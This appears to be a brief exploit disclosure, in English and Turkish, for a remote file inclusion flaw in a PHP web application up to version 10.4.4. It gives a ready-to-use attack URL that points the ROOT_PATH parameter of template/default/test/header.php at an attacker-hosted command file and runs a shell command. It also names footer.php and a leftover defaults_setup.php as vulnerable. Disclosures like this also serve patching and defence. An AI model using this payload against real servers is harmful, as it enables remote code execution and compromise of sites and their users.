ENGLISH
http://[target]/[path]/template/default/test/header.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls
TURKISH
http://[target]/[path]/template/default/test/header.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls
Açıklama:
Temalarda bulunan footer.php dosyası güvenlik açığına yol açmaktadır.Bu sayede
uzaktan kod çalıştırılabilir.
defaults_setup.php kurulumdan sonra silinmemişse aynı açık uygulanabilmektedir.
test/header.php bölümü ise bazen denk gelmektedir,aynı açık bulunmaktadır.
Açık 10.4.4 dahil alt sürümlerinde çalışmaktadır.
Thanks.